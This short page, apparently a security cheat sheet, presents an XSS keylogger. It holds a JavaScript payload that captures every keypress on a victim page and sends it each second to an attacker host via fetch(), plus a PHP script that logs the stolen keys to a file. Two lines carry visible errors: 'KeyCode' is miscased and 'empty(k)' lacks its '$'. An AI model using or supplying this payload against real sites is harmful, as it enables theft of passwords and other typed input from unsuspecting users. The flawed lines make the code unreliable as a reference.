XSS Keylogger

k.js

keys = "";

document.onkeypress = function(e){
	get = window.event? event:e;
	key = get.keyCode? get.KeyCode:get.charCode;
	key = String.fromCharCode(key);
  keys +=key;
}

setInterval(function(){
	fetch('//attacker.com/k.php?k=' + keys);
}, 1000);

k.php

<?php
	$k = $_GET["k"];
  if(!empty(k)){
  	$f = fopen("log.txt", "a+");
    fwrite($f,$k);
    fclose($f);
  }

Ref

Slide

Watch on [YouTube](https://www.youtube.com/watch?v=XUle4pXu-Lg)
Show Comments